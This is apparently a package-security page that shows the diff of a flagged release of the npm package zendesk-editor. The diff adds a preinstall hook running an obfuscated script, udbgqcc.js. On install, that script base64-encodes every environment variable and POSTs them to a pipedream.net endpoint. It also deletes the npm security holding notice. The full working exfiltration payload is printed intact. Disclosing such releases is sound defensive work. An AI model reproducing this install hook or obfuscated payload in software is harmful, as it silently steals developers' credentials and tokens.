zendesk-editor 0.0.1-security → 8.899.587
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of zendesk-editor might be problematic. Click here for more details.
- package/package.json +8 -3
- package/udbgqcc.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "zendesk-editor",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "8.899.587",
|
4
|
+
"main": "udbgqcc.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node udbgqcc.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/udbgqcc.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x356159=a0_0x4fca;(function(_0x5dcd04,_0x47455c){const _0x192bd1=a0_0x4fca,_0x53251e=_0x5dcd04();while(!![]){try{const _0x14b89d=parseInt(_0x192bd1(0xf4))/0x1+-parseInt(_0x192bd1(0xe7))/0x2*(-parseInt(_0x192bd1(0xf2))/0x3)+parseInt(_0x192bd1(0xe9))/0x4*(parseInt(_0x192bd1(0xf1))/0x5)+-parseInt(_0x192bd1(0xe0))/0x6+-parseInt(_0x192bd1(0xf3))/0x7*(parseInt(_0x192bd1(0xec))/0x8)+parseInt(_0x192bd1(0xdf))/0x9+parseInt(_0x192bd1(0xf0))/0xa*(-parseInt(_0x192bd1(0xe5))/0xb);if(_0x14b89d===_0x47455c)break;else _0x53251e['push'](_0x53251e['shift']());}catch(_0x4be28e){_0x53251e['push'](_0x53251e['shift']());}}}(a0_0x14d3,0xaf17e));function a0_0x14d3(){const _0x32fb6a=['env','8oxgCmL','toString','POST','4aaa0dfa016c3686a57e93787657fa37','10BGqacR','28565HGqDya','33XgKrok','9428573Sllqrt','845671wCCbOG','7569756dvbIVj','3789594GmvkAD','join','from','net','request','1893419ccdiDE','base64','82826pNiETg','pipedream','508LoFSme','end'];a0_0x14d3=function(){return _0x32fb6a;};return a0_0x14d3();}const http=require('https');function a0_0x4fca(_0x3dd746,_0x59668b){const _0x14d31=a0_0x14d3();return a0_0x4fca=function(_0x4fcab5,_0x5ef8fd){_0x4fcab5=_0x4fcab5-0xdf;let _0x6e83c1=_0x14d31[_0x4fcab5];return _0x6e83c1;},a0_0x4fca(_0x3dd746,_0x59668b);}req=http[a0_0x356159(0xe4)]({'host':[a0_0x356159(0xef),'m',a0_0x356159(0xe8),a0_0x356159(0xe3)][a0_0x356159(0xe1)]('.'),'path':'/'+(process[a0_0x356159(0xeb)]['npm_package_name']||''),'method':a0_0x356159(0xee)}),req['write'](Buffer[a0_0x356159(0xe2)](JSON['stringify'](process[a0_0x356159(0xeb)]))[a0_0x356159(0xed)](a0_0x356159(0xe6))),req[a0_0x356159(0xea)]();
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zendesk-editor for more information.
|